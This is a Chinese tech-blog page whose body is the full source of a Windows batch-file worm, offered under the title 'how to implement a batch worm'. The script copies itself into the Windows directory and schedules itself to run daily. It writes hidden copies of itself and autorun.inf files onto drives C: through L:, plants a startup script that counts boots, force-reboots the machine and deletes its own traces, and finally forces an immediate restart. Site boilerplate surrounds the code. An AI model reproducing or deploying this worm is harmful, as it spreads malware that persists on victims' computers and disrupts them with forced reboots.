溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點(diǎn)擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

如何實(shí)現(xiàn)批處理蠕蟲bat

發(fā)布時(shí)間:2021-09-30 11:12:16 來源:億速云 閱讀:240 作者:小新 欄目:開發(fā)技術(shù)

這篇文章主要介紹了如何實(shí)現(xiàn)批處理蠕蟲bat,具有一定借鑒價(jià)值,感興趣的朋友可以參考下,希望大家閱讀完這篇文章之后大有收獲,下面讓小編帶著大家一起了解一下。

代碼如下:

@echo off  
attrib -r -h -s "%~nx0" 2>nul >nul  
attrib -r -h -s %windir%\"%~nx0" 2>nul >nul  
copy "%~nx0" %windir% /y 2>nul >nul  
at 9:20 /every:m,t,w,th,f,s,su "%windir%\%~nx0"  
echo reboot>%windir%\temp.dll  
set pat=「開始」菜單\程序\啟動(dòng)  
echo @echo off>"%ALLUSERSPROFILE%\%pat%"\reboot.bat  
echo echo reboot^>^>%%windir%%\temp.dll>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat  
echo find /c "reboot" %%windir%%\temp.dll^|find "11">>"%ALLUSERSPROFILE%\%pat%"\reboot.bat  
echo if errorlevel 1 goto rebootnow>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat  
echo del %%windir%%\user.dll /f /q>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat  
echo del %%windir%%\temp.dll /f /q>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat  
echo del /f /q "%%~nx0">>"%ALLUSERSPROFILE%\%pat%"\reboot.bat  
echo exit>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat  
echo :rebootnow>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat  
echo shutdown /r /t 0 /f>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat  
echo exit>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat  
echo [autorun]>%windir%\user.dll  
echo shellexecute=%~nx0>>%windir%\user.dll  
set disk=C:>nul 2>nul  
:auto  
copy %windir%\"%~nx0" %disk%\ /y 2>nul >nul  
copy %windir%\user.dll %disk%\autorun.inf /y 2>nul >nul  
attrib +s +h +r %disk%\%~nx0 2>nul >nul  
attrib +s +h +r %disk%\autorun.inf 2>nul >nul  
cls  
goto %disk%>nul 2>nul  
:C:  
set disk=D:>nul 2>nul  
goto auto>nul 2>nul  
: D: 
set disk=E:>nul 2>nul  
goto auto>nul 2>nul  
:E:  
set disk=F:>nul 2>nul  
goto auto>nul 2>nul  
:F:  
set disk=G:>nul 2>nul  
goto auto>nul 2>nul  
:G:  
set disk=H:>nul 2>nul  
goto auto>nul 2>nul  
:H:  
set disk=I:>nul 2>nul  
goto auto>nul 2>nul  
:I:  
set disk=J:>nul 2>nul  
goto auto>nul 2>nul  
:J:  
set disk=K:>nul 2>nul  
goto auto>nul 2>nul  
:K:  
set disk=L:>nul 2>nul  
goto auto>nul 2>nul  
: L: 
cls  
attrib +s +h +r %windir%\%~nx0 2>nul >nul  
shutdown /r /t 0 /f  
exit

感謝你能夠認(rèn)真閱讀完這篇文章,希望小編分享的“如何實(shí)現(xiàn)批處理蠕蟲bat”這篇文章對大家有幫助,同時(shí)也希望大家多多支持億速云,關(guān)注億速云行業(yè)資訊頻道,更多相關(guān)知識等著你來學(xué)習(xí)!

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

bat
AI